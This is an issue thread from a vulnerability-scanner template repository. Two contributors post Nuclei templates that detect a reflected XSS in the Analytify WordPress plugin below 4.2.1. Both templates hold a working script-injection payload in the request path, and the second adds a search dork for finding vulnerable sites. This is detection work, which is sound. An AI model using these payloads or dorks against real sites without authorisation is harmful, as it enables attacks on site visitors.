### ISSUE TITLE
Analytify < 4.2.1 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4812]
```yaml
id: analytify-xss

info:
  name: Analytify < 4.2.1 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
  tags: wp-plugin,xss,wp,wordpress,analytify

requests:
  - method: GET
    path:
      - '{{BaseURL}}/aa404bb?a</script><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```

**Comment by DhiyaneshGeek** [comment]
@akincibor Thanks for the template contribution :)  i have made changes to detect it .

```yaml
id: analytify-xss

info:
  name: Analytify < 4.2.1 - Reflected Cross-Site Scripting
  author: Akincibor,DhiyaneshDK
  severity: medium
  description: The plugin does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to Reflected Cross-Site Scripting.
  metadata:
    verified: true
    google-dork: inurl:/wp-content/plugins/wp-analytify
  reference:
    - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5
  tags: wp-plugin,xss,wp,wordpress,analytify

requests:
  - method: GET
    path:
      - '{{BaseURL}}/aa404bb?a</script><script>alert(/XSS/)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '>alert(/XSS/)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 404
```
